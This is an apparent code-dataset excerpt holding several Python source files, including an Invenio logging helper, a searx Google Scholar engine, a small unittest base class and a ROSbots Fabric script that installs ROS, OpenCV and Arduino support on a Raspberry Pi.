text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import print_function
VERBOSITY = None
import sys
from datetime import datetime
from invenio.legacy.bibsched.bibtask import write_message as bibtask_write_message
def setup_loggers(verbosity):
global VERBOSITY
if verbosity > 8:
print('Setting up loggers: verbosity=%s' % verbosity)
VERBOSITY = verbosity
def write_message(msg, stream=sys.stdout, verbose=1):
"""Write message and flush output stream (may be sys.stdout or sys.stderr).
Useful for debugging stuff."""
if VERBOSITY is None:
return bibtask_write_message(msg, stream, verbose)
elif msg and VERBOSITY >= verbose:
if VERBOSITY > 8:
print(datetime.now().strftime('[%H:%M:%S] '), end=' ', file=stream)
print(msg, file=stream)
|
PXke/invenio
|
invenio/legacy/docextract/utils.py
|
Python
|
gpl-2.0
| 1,606 | 0.010585 |
# SPDX-License-Identifier: AGPL-3.0-or-later
# lint: pylint
"""Google (Scholar)
For detailed description of the *REST-full* API see: `Query Parameter
Definitions`_.
.. _Query Parameter Definitions:
https://developers.google.com/custom-search/docs/xml_results#WebSearch_Query_Parameter_Definitions
"""
# pylint: disable=invalid-name, missing-function-docstring
from urllib.parse import urlencode
from datetime import datetime
from lxml import html
from searx import logger
from searx.utils import (
eval_xpath,
eval_xpath_list,
extract_text,
)
from searx.engines.google import (
get_lang_info,
time_range_dict,
detect_google_sorry,
)
# pylint: disable=unused-import
from searx.engines.google import (
supported_languages_url,
_fetch_supported_languages,
)
# pylint: enable=unused-import
# about
about = {
"website": 'https://scholar.google.com',
"wikidata_id": 'Q494817',
"official_api_documentation": 'https://developers.google.com/custom-search',
"use_official_api": False,
"require_api_key": False,
"results": 'HTML',
}
# engine dependent config
categories = ['science']
paging = True
language_support = True
use_locale_domain = True
time_range_support = True
safesearch = False
logger = logger.getChild('google scholar')
def time_range_url(params):
"""Returns a URL query component for a google-Scholar time range based on
``params['time_range']``. Google-Scholar does only support ranges in years.
To have any effect, all the Searx ranges (*day*, *week*, *month*, *year*)
are mapped to *year*. If no range is set, an empty string is returned.
Example::
&as_ylo=2019
"""
# as_ylo=2016&as_yhi=2019
ret_val = ''
if params['time_range'] in time_range_dict:
ret_val= urlencode({'as_ylo': datetime.now().year -1 })
return '&' + ret_val
def request(query, params):
"""Google-Scholar search request"""
offset = (params['pageno'] - 1) * 10
lang_info = get_lang_info(
# pylint: disable=undefined-variable
# params, {}, language_aliases
params, supported_languages, language_aliases
)
# subdomain is: scholar.google.xy
lang_info['subdomain'] = lang_info['subdomain'].replace("www.", "scholar.")
query_url = 'https://'+ lang_info['subdomain'] + '/scholar' + "?" + urlencode({
'q': query,
'hl': lang_info['hl'],
'lr': lang_info['lr'],
'ie': "utf8",
'oe': "utf8",
'start' : offset,
})
query_url += time_range_url(params)
logger.debug("query_url --> %s", query_url)
params['url'] = query_url
logger.debug("HTTP header Accept-Language --> %s", lang_info['Accept-Language'])
params['headers']['Accept-Language'] = lang_info['Accept-Language']
params['headers']['Accept'] = (
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
)
#params['google_subdomain'] = subdomain
return params
def response(resp):
"""Get response from google's search request"""
results = []
detect_google_sorry(resp)
# which subdomain ?
# subdomain = resp.search_params.get('google_subdomain')
# convert the text to dom
dom = html.fromstring(resp.text)
# parse results
for result in eval_xpath_list(dom, '//div[@class="gs_ri"]'):
title = extract_text(eval_xpath(result, './h3[1]//a'))
if not title:
# this is a [ZITATION] block
continue
url = eval_xpath(result, './h3[1]//a/@href')[0]
content = extract_text(eval_xpath(result, './div[@class="gs_rs"]')) or ''
pub_info = extract_text(eval_xpath(result, './div[@class="gs_a"]'))
if pub_info:
content += "[%s]" % pub_info
pub_type = extract_text(eval_xpath(result, './/span[@class="gs_ct1"]'))
if pub_type:
title = title + " " + pub_type
results.append({
'url': url,
'title': title,
'content': content,
})
# parse suggestion
for suggestion in eval_xpath(dom, '//div[contains(@class, "gs_qsuggest_wrap")]//li//a'):
# append suggestion
results.append({'suggestion': extract_text(suggestion)})
for correction in eval_xpath(dom, '//div[@class="gs_r gs_pda"]/a'):
results.append({'correction': extract_text(correction)})
return results
|
dalf/searx
|
searx/engines/google_scholar.py
|
Python
|
agpl-3.0
| 4,416 | 0.003397 |
import unittest
from aquarius.Aquarius import Aquarius
class ConsoleTestBase(unittest.TestCase):
def initialise_app_mock(self):
self.app = Aquarius(None, None, None)
def assert_called(self, method):
self.assertTrue(method.called)
|
jeroanan/Aquarius
|
tests/output/console/ConsoleTestBase.py
|
Python
|
gpl-3.0
| 257 | 0.003891 |
#
# This file is part of ROSbots Setup Tools.
#
# Copyright
#
# Copyright (C) 2017 Jack Pien <jack@rosbots.com>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://www.rosbots.com
#
import os
import datetime as dt
import random
import time
from fabric.api import *
import fabric.contrib.files as fabfiles
from fabric.utils import fastprint
#env.hosts = ["localhost"]
env.user = 'pi'
env.shell = '/bin/bash -l -c'
is_debug = False
def _get_input(msg, force_need_query=False):
global is_debug
if is_debug or force_need_query:
val = raw_input(msg + "\n")
return val
else:
return ""
def _fp(msg):
fastprint(msg + "\n")
def _pp(msg):
"""
Print then pause
"""
global is_debug
_fp(msg)
if is_debug:
programPause = _get_input("Press the <ENTER> key to continue...")
WS_DIR = "/ros_catkin_ws"
INSTALL_DIR = WS_DIR + "/build/opt/ros/kinetic"
def main_setup_only_rosbots_components():
step_7_setup_ros_rosbots_packages()
step_8_setup_mcu_uno_support()
step_9_setup_mcu_uno_support_part_2()
def main_setup_ros_opencv_for_rosbots():
step_1_setup_ros_for_pi()
step_2_setup_ros_robot_packages()
#step_3_setup_ros_rosbots_packages()
step_4_setup_opencv_for_pi()
step_5_setup_ros_robot_image_common_package()
step_6_setup_ros_robot_vision_packages()
step_7_setup_ros_rosbots_packages()
step_8_setup_mcu_uno_support()
step_9_setup_mcu_uno_support_part_2()
def main_setup_ros_opencv():
step_1_setup_ros_for_pi()
step_2_setup_ros_robot_packages()
step_4_setup_opencv_for_pi()
step_5_setup_ros_robot_image_common_package()
step_6_setup_ros_robot_vision_packages()
def helloworld():
run("ls -la")
#with cd("~"):
# home_path = run("pwd")
# ws_dir = home_path + WS_DIR
# put("./rosbots_service_template.bash", "~/rosbots_template")
# run("cat rosbots_template | sed 's/_TEMPLATE_HOME/" + home_path.replace("/", "\/") + "/' | sed 's/_TEMPLATE_WS_PATH/" + ws_dir.replace("/", "\/") + "/' > rosbots")
def how_to_test_rosbots_python_scripts():
_fp("Say you wrote a rosbots python script called foo.py. (1) chmod +x foo.py. (2) scp it over to the /home/pi/ros_catkin_ws/build/opt/ros/kinetic/share/rosbots_driver. (3) from remote machine 'rosrun rosbots_driver foo.py'")
def push_test_ros_script(path_fn=None):
if path_fn == None:
_fp("\nERROR\nPlease specify local ROS script name")
_fp("$ fab push_test_ros_script:<script>")
return
fn = path_fn.split("/")[-1]
remote_path = "/home/pi/ros_catkin_ws/build/opt/ros/kinetic/share"
ros_pkg_name = "rosbots_driver"
_fp("Pushing " + path_fn + " to remote location: " +
remote_path + "/" + ros_pkg_name)
put(path_fn, remote_path + "/" + ros_pkg_name)
run("chmod +x " + remote_path + "/" + ros_pkg_name + "/" + fn)
#open_shell("rosrun " + ros_pkg_name + " " + fn)
run("sudo su -c 'source /home/pi/ros_catkin_ws/build/opt/ros/kinetic/setup.bash && export PYTHONPATH=/home/pi/lib/python:${PYTHONPATH} && rosrun " + ros_pkg_name + " " + fn + "'")
def push_test_rosbots_motor_driver_script():
run("echo 'Starting...'")
home_path = run("pwd")
rosbots_startup_fn = "rosbots_startup.sh"
local_md_dir = "../../ros_ws/src/rosbots_driver/scripts/rosbots_driver"
remote_md_dir = "/home/pi/ros_catkin_ws/build/opt/ros/kinetic/lib/rosbots_driver"
md_fn = "motor_driver.py"
rosnode_name = "/motor_driver"
# Kill current motor_driver node
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
if run("rosnode list | grep -i " + rosnode_name, warn_only=True).succeeded:
_fp("Killing current " + rosnode_name + " rosnode")
run("rosnode kill `rosnode list | grep -i " + rosnode_name + "`")
#_fp(actual_name)
#run("rosnode kill " + rosnode_name)
env.shell = old_shell
# Push new startup script
if False:
put("./rosbots_startup.sh", "~/rosbots_startup.sh")
run("chmod +x ~/rosbots_startup.sh")
# Push the new motor driver file
if fabfiles.exists(remote_md_dir + "/" + md_fn) == False:
_fp("No remote " + md_fn + " found!!! Quitting")
return
else:
put(local_md_dir + "/" + md_fn, remote_md_dir + "/" + md_fn)
run("rm " + remote_md_dir + "/" + md_fn + "c", warn_only=True)
# Start the rosbots startup script
sudo("export ROSBOTS_HOME=/home/pi; export ROSBOTS_WS_PATH=/home/pi/ros_catkin_ws; " + home_path + "/" + rosbots_startup_fn)
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
_fp("List of running ros nodes")
run("rosnode list")
env.shell = old_shell
def setup_wifi_on_pi():
supplicant_fn = "/etc/wpa_supplicant/wpa_supplicant.conf"
run("echo 'Starting...'")
#if run("grep 'country=GB' " + supplicant_fn, warn_only=True).succeeded:
# pass
#else:
# _fp("")
# _pp("You should probably set 'country=US' in your supplicant file " + \
# supplicant_fn + " when you get a chance...")
wifi_reg_domain = _get_input("What is your country's wifi regulatory domain (ISO 3166 alpha2 country code, ie 'US')?", force_need_query=True)
_fp(wifi_reg_domain)
ssid_name = _get_input("What is the SSID?", force_need_query=True)
_fp(ssid_name)
if sudo("grep 'ssid=\"" + ssid_name + "\"' " + supplicant_fn, \
warn_only=True).succeeded:
_fp("This SSID is already set up")
else:
wpa_pwd = _get_input("What is the WPA pwd?", force_need_query=True)
_fp(wpa_pwd)
name = _get_input("What do you want to name this network?", force_need_query=True)
_fp(name)
_fp("Adding the network you specified into " + supplicant_fn)
network_config = "country=" + wifi_reg_domain + "\n" + \
"\n\n" + \
"network={\n" + \
" ssid=\"" + ssid_name + "\"\n" + \
" psk=\"" + wpa_pwd + "\"\n" + \
" id_str=\"" + name + "\"\n" + \
"}\n"
sudo("cp " + supplicant_fn + " " + supplicant_fn + ".old")
sudo("echo '" + network_config + "' >> " + supplicant_fn)
_fp("To get IP address of Pi, from a linux system - 'arp -a'")
def step_8_setup_mcu_uno_support():
_pp("Plug in the UNO board to the RPi's USB port")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
pio_path = rosbots_path + "/platformio/rosbots_firmware"
rosserial_path = git_path + "/rosserial"
ws_dir = home_path + "/rosbots_catkin_ws"
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
# Just download, we'll build it isolated later
#_setup_ros_other_packages("actionlib_msgs", run_rosdep=False)
_setup_ros_other_packages("nav_msgs", run_rosdep=False)
# Need nav_msgs compiled
with cd(main_ros_ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
#run(main_ros_ws_dir + "/src/catkin/bin/catkin_make -j1 --pkg nav_msgs")
#run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install -j1 --pkg nav_msgs")
#run("./src/catkin/bin/catkin_make_isolated --pkg actionlib_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
run("./src/catkin/bin/catkin_make_isolated --pkg nav_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
env.shell = old_shell
# Old pip causes incompleteread importerror
sudo("easy_install --upgrade pip")
# So we can access USB serial port
sudo("usermod -a -G dialout pi")
# Some requirements
sudo("pip install -U testresources")
sudo("pip install -U platformio")
sudo("pip install -U backports.functools_lru_cache")
_fp("=============")
_pp("If this is the first time running setup, the next step will most likely fail since you need a reboot to enable the UNO drivers. If it fails, reboot and run this step again.")
_fp("=============\n")
def step_9_setup_mcu_uno_support_part_2():
_pp("Plug in the UNO board to the RPi's USB port")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
pio_path = rosbots_path + "/platformio/rosbots_firmware"
rosserial_path = git_path + "/rosserial"
ws_dir = home_path + "/rosbots_catkin_ws"
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
with cd(pio_path):
run("platformio run -e uno -t upload")
# We need diagnostic_msgs, but just download, we'll compile
# it on our own
_setup_ros_other_packages("diagnostic_msgs", run_rosdep=False)
# Download and install rosserial
if not fabfiles.exists(rosserial_path):
with cd(git_path):
run("git clone https://github.com/ros-drivers/rosserial.git")
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists("rosserial"):
run("rm rosserial")
run("ln -s " + rosserial_path)
else:
_fp("Found rosserial repo, just fetching top and rebasing")
with cd(rosserial_path):
run("git fetch origin")
run("git rebase origin/jade-devel")
with cd(ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make -j1")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install -j1")
env.shell = old_shell
# Need diagnostic_msgs which rosserial_python needs
# catkin_make_isolated --pkg diagnostic_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space /home/pi/ros_catkin_ws/build/opt/ros/kinetic
subpackage = "diagnostic_msgs"
with cd(main_ros_ws_dir):
run("./src/catkin/bin/catkin_make_isolated --pkg " + subpackage + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j1")
#Update pip if necessary
sudo("easy_install --upgrade pip")
# Rerun the init script
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
def step_5_setup_ros_robot_image_common_package():
home_path = run("pwd")
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
_pp("Usually done after you set up OpenCV and the other robot and rosbot packages. This mainly sets up image_transport.")
_setup_ros_other_packages("image_common")
def step_2_setup_ros_robot_packages():
_pp("After you successfully install ros_com stuff, install some others. This installs geometry_msgs needed for Twist among other types of basic telemetry messages.")
_setup_ros_other_packages("geometry_msgs")
_setup_ros_other_packages("teleop_twist_keyboard")
def _setup_ros_packages_from_git(ros_package_name, git_url, subpackage_list):
run("echo 'Starting...'")
home_path = run("pwd")
git_path = home_path + "/gitspace"
ros_package_path = git_path + "/" + ros_package_name #"/rosbots"
ws_dir = home_path + WS_DIR
install_dir = home_path + INSTALL_DIR
_fp("Do we need to create gitspace folder?")
if not fabfiles.exists(git_path):
run("mkdir " + git_path)
_fp("Do we need to git clone the repo?")
if not fabfiles.exists(ros_package_path):
_fp("Did not find " + ros_package_name + " repo, cloning...")
with cd(git_path):
run("git clone " + git_url)
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists(ros_package_name):
run("rm " + ros_package_name)
run("ln -s " + ros_package_path)
else:
#_fp("Found the repo, just fetching top and rebasing")
#with cd(ros_package_path):
# run("git fetch origin")
# run("git rebase origin/master")
_pp("Found the repo, not doing anything - feel free to git fetch and rebase manually")
for subpackage in subpackage_list:
_fp("Compiling " + subpackage + "...")
with cd(ws_dir):
run("./src/catkin/bin/catkin_make_isolated --pkg " + subpackage + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j1")
def step_6_setup_ros_robot_vision_packages():
_fp("Usually done after you set up OpenCV and the other robot and rosbot packages")
_pp("This sets up mainly cv_bridge so we can pass CV image messages around. Setting up from github instead of rosinstall because rosinstall will pull in OpenCV automatically and you should have already built it from source.")
_setup_ros_packages_from_git("vision_opencv", \
"https://github.com/ros-perception/vision_opencv.git", \
["cv_bridge", "image_geometry", "vision_opencv"])
def step_7_setup_ros_rosbots_packages():
run("echo 'Starting...'")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
ws_dir = home_path + "/rosbots_catkin_ws" # home_path + WS_DIR
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
# Just download tf and geometry2, which includes tf2.
# We'll compile it ourselves later
_setup_ros_other_packages("geometry", run_rosdep=False)
_setup_ros_other_packages("geometry2", run_rosdep=False)
# Need tf and tf2 compiled
with cd(main_ros_ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
package_list = [
"angles", "actionlib_msgs", "actionlib", "tf2_msgs", "tf2", "tf2_py", "tf2_ros", "tf"]
for pkg in package_list:
run("./src/catkin/bin/catkin_make_isolated --pkg " + pkg + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
env.shell = old_shell
sudo("apt-get install -y python-pip")
sudo("pip install picamera")
# Create a separate rosbots_catkin_ws outside of core ROS
if not fabfiles.exists(ws_dir):
_fp("Need to create and init rosbots catkin workspace")
run("mkdir -p " + ws_dir + "/src")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
with cd(ws_dir + "/src"):
run(main_ros_ws_dir + "/src/catkin/bin/catkin_init_workspace")
with cd(ws_dir):
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
src_cmd = "source " + ws_dir + "/devel/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROSbots catkin ws env setup.bash is already in your bashrc")
else:
_pp("Going to add ROSbots catkin ws source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
if not fabfiles.exists(git_path):
_fp("Did not find rosbots repo, cloning...")
run("mkdir " + git_path)
if not fabfiles.exists(rosbots_path):
with cd(git_path):
run("git clone https://github.com/ROSbots/rosbots_driver.git")
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists("rosbots_driver"):
run("rm rosbots_driver")
run("ln -s " + rosbots_path)
else:
_fp("Found rosbots repo, just fetching top and rebasing")
with cd(rosbots_path):
run("git fetch origin")
run("git rebase origin/master")
with cd(ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
# Installing RPIO DMA PWM library
with cd(git_path):
# Don't install RPIO library. May be causing non-deterministic
# kernel panic when used.
#if not fabfiles.exists("RPIO"):
if False:
_pp("Did not find RPIO library so downloading and setting up")
# Old library does not support RPi 3
#run("git clone https://github.com/metachris/RPIO.git --branch v2 --single-branch")
#run("git clone https://github.com/limuxy/RPIO.git")
run("git clone https://github.com/ROSbots/RPIO.git --branch v2_branch --single-branch")
with cd("RPIO"):
run("python setup.py build")
_pp("Did build complete for RPIO?")
run("mkdir -p " + home_path + "/lib/python")
run("export PYTHONPATH=" + home_path + "/lib/python; python setup.py -v install --home " + home_path)
_pp("Did RPIO install correctly into " + home_path + "?")
# Update with newest bashrc for rosbots
put("./sourceme_rosbots.bash", "~/")
# Rerun the init script
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
def _setup_ros_other_packages(rospkg, run_rosdep=True):
run("echo 'Starting...'")
home_path = run("pwd")
ws_dir = home_path + WS_DIR
if not fabfiles.exists(ws_dir):
_fp("ROS Workspace not found - run the main set up first")
return
with cd(ws_dir):
ts = str(time.time()).split(".")[0]
fn = "kinetic-custom_" + str(ts) + "_ros.rosinstall"
run("rosinstall_generator " + rospkg + " --rosdistro kinetic --deps --wet-only --tar > " + fn)
run("cat " + fn)
_pp("Did rosinstall generator create the install file correctly? If so, we're going to merge and update the workspace. (If there are duplicate packages, hit DELETE and REPLACE!)")
run("wstool merge -y -t src " + fn)
_pp("Did the wstool merge correctly? If so, we are going to update on the install file for the workspace.")
run("wstool update --delete-changed-uris -t src")
_pp("Did the wstool update correctly? If so, we are going to update dependencies.")
if run_rosdep:
run("rosdep install --from-paths src --ignore-src --rosdistro kinetic -y -r --os=debian:jessie")
_pp("Did the dependencies update ok? If so, let's compile the new packages.")
run("./src/catkin/bin/catkin_make_isolated --install -DCMAKE_BUILD_TYPE=Release --install-space " + home_path + INSTALL_DIR + " -j1")
def step_4_setup_opencv_for_pi():
"""
To build this in a Docker container:
run:
docker run -it --name rosbots_build rosbots-raspbian:lite /bin/bash
apt-get update; apt-get -y upgrade
apt-get install -y libgdk-pixbuf2.0-dev libpango1.0-dev libcairo2-dev
apt-get install -y libgtk2.0-dev
apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev libavutil-dev python-pip git
pip install numpy
mkdir -p /home/pi/gitspace
cd /home/pi/gitspace
git clone https://github.com/opencv/opencv.git
cd opencv
git checkout -b 3.4.6_branch tags/3.4.6
cd ../
git clone https://github.com/opencv/opencv_contrib.git
cd opencv_contrib
git checkout -b 3.4.6_branch tags/3.4.6
cd ../opencv
mkdir build
cd build
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local -D INSTALL_PYTHON_EXAMPLES=ON -D OPENCV_ENABLE_NONFREE=ON -D OPENCV_EXTRA_MODULES_PATH=/home/pi/gitspace/opencv_contrib/modules -D BUILD_EXAMPLES=ON ..
make -j4
On physcial RPi:
cd /home/pi/gitspace
git clone https://github.com/opencv/opencv.git
cd opencv
git checkout -b 3.4.6_branch tags/3.4.6
cd ../
git clone https://github.com/opencv/opencv_contrib.git
cd opencv_contrib
git checkout -b 3.4.6_branch tags/3.4.6
copy /home/pi/gitspace/opencv/build to /home/pi/gitspace/opencv
sudo apt-get update; sudo apt-get -y upgrade
sudo apt-get install -y libgdk-pixbuf2.0-dev libpango1.0-dev libcairo2-dev
sudo apt-get install -y libgtk2.0-dev
sudo apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev libavutil-dev python-pip git
then cd /home/pi/gitspace/opencv/build,
'sudo make install/fast', 'sudo ldconfig'
"""
_pp("Roughly following http://www.pyimagesearch.com/2016/04/18/install-guide-raspberry-pi-3-raspbian-jessie-opencv-3/")
#_fp("Update system first")
#sudo("apt-get update")
#sudo("apt-get -y upgrade")
_fp("Installing dependencies for OpenCV")
# Need to install libgtk2.0 first in Stretch?!?
sudo("apt-get install -y libgtk2.0-dev")
sudo("apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev")
# Needed for web_video_server and perhaps help with OpenCV support as well
sudo("apt-get install -y libavutil-dev")
sudo("apt-get install -y python-pip")
sudo("sudo pip install numpy")
sudo("sudo pip install --upgrade numpy")
home_path = run("pwd")
git_path = home_path + "/gitspace"
_fp("Do we need to create gitspace folder?")
if not fabfiles.exists(git_path):
run("mkdir " + git_path)
_fp("Git cloning OpenCV if need be")
if not fabfiles.exists(git_path + "/opencv"):
with cd(git_path):
run("git clone https://github.com/opencv/opencv.git")
with cd(git_path + "/opencv"):
run("git tag -l")
#_pp("We are compiling 3.4.1 - make sure this is the latest from the tag list printed above")
#run("git checkout -b 3.4.1_branch tags/3.4.1")
_pp("We are compiling 3.4.6 - make sure this is the latest from the tag list printed above")
run("git checkout -b 3.4.6_branch tags/3.4.6")
opencv_contrib_path = git_path + "/opencv_contrib"
if not fabfiles.exists(opencv_contrib_path):
with cd(git_path):
run("git clone https://github.com/opencv/opencv_contrib.git")
with cd(opencv_contrib_path):
run("git tag -l")
#_pp("We are compiling 3.4.1 - make sure this is the latest from the tag list printed above")
#run("git checkout -b 3.4.1_branch tags/3.4.1")
_pp("We are compiling 3.4.6 - make sure this is the latest from the tag list printed above")
run("git checkout -b 3.4.6_branch tags/3.4.6")
_fp("Setting up OpenCV cmake if need be")
if not fabfiles.exists(git_path + "/opencv/build"):
with cd(git_path + "/opencv"):
run("mkdir build")
# Set up compile
with cd(git_path + "/opencv/build"):
run("cmake -D CMAKE_BUILD_TYPE=RELEASE " + \
"-D CMAKE_INSTALL_PREFIX=/usr/local " + \
"-D INSTALL_PYTHON_EXAMPLES=ON -D OPENCV_ENABLE_NONFREE=ON " + \
"-D OPENCV_EXTRA_MODULES_PATH=" + \
opencv_contrib_path + "/modules " + \
"-D BUILD_EXAMPLES=ON ..")
# Compile
_fp("Compiling OpenCV...")
with cd(git_path + "/opencv/build"):
run("make -j1")
sudo("make install")
sudo("ldconfig")
def step_x_setup_ros_for_ubuntu_mate_pi():
run("echo 'Roughly following http://wiki.ros.org/kinetic/Installation/Ubuntu'")
_pp("* If you need to do raspi-config stuff, CTRL-C out and do that before running this script")
# Setup ROS Repositories
if not fabfiles.exists("/etc/apt/sources.list.d/ros-latest.list"):
sudo("apt-get update")
sudo("sh -c 'echo \"deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main\" > /etc/apt/sources.list.d/ros-latest.list'")
sudo("apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 421C365BD9FF1F717815A3895523BAEEB01FA116") #apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 0xB01FA116")
sudo("apt-get update")
sudo("apt-get -y upgrade")
else:
_fp("ros-lastest.list already exists... skipping set up")
sudo("apt-get update")
sudo("apt-get -y upgrade")
sudo("apt-get install -y ros-kinetic-ros-base")
def step_1_setup_ros_for_pi():
"""
To compile ros2 on in a Docker Raspbian container:
docker run -it --name rosbots_ros2_build rosbots-raspbian:lite /bin/bash
update-locale LC_ALL=en_GB.UTF-8 LANG=en_GB.UTF-8
export LANG=en_GB.UTF-8
export LC_ALL=en_GB.UTF-8
apt update && apt install -y \
build-essential \
cmake \
git \
python3-pip \
python-rosdep \
libxml2-dev \
libxslt1-dev \
wget
apt install -y virtualenvwrapper
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
mkvirtualenv py_3 --python=/usr/bin/python3
pip install -U argcomplete catkin_pkg colcon-common-extensions coverage empy flake8 flake8-blind-except flake8-builtins flake8-class-newline flake8-comprehensions flake8-deprecated flake8-docstrings flake8-import-order flake8-quotes lark-parser mock nose pep8 pydocstyle pyparsing setuptools vcstool \
pytest-repeat \
pytest-rerunfailures \
pytest \
pytest-cov \
pytest-runner \
lxml \
rosdep
apt-get install --no-install-recommends -y \
libasio-dev \
libtinyxml2-dev
mkdir -p /home/pi/ros2_ws/src
cd /home/pi/ros2_ws
wget https://raw.githubusercontent.com/ros2/ros2/release-latest/ros2.repos
vcs import src < ros2.repos
(sudo) rosdep init
rosdep update
rosdep install --from-paths src --ignore-src --rosdistro crystal -y -r --os=debian:stretch
pip install -U lark-parser
colcon build --symlink-install --packages-skip ros1_bridge --packages-ignore qt_gui_cpp rqt_gui_cpp
On the physical RPi, do all steps above except the colcon build step
then, docker cp /home/pi/ros2_ws/install ./build ./log to the physical RPi /home/pi/ros2_ws
Install python3.6
Change these scripts to use the python3 in the correct virtualenv directory
install/ros2cli/bin/_ros2_daemon:#!/root/.virtualenvs/py_3/bin/python3
install/ros2cli/bin/ros2:#!/root/.virtualenvs/py_3/bin/python3
. ~/ros2_ws/install/local_setup.bash (or setup.bash)
ros2 run demo_nodes_cpp talker
ros2 run demo_nodes_py listener
"""
global WS_DIR
global INSTALL_DIR
run("echo 'Roughly following http://wiki.ros.org/ROSberryPi/Installing%20ROS%20Kinetic%20on%20the%20Raspberry%20Pi'")
_fp("Set up / compile ROS on Rasbian Jessie Lite 2016-05-27")
_pp("* If you need to do raspi-config stuff, CTRL-C out and do that before running this script")
# Setup ROS Repositories
if not fabfiles.exists("/etc/apt/sources.list.d/ros-latest.list"):
# Raspbian Stretch does not have dirmngr installed by default. This
# is needed for apt-key
sudo("apt-get update")
sudo("apt-get -y install dirmngr")
sudo("sh -c 'echo \"deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main\" > /etc/apt/sources.list.d/ros-latest.list'")
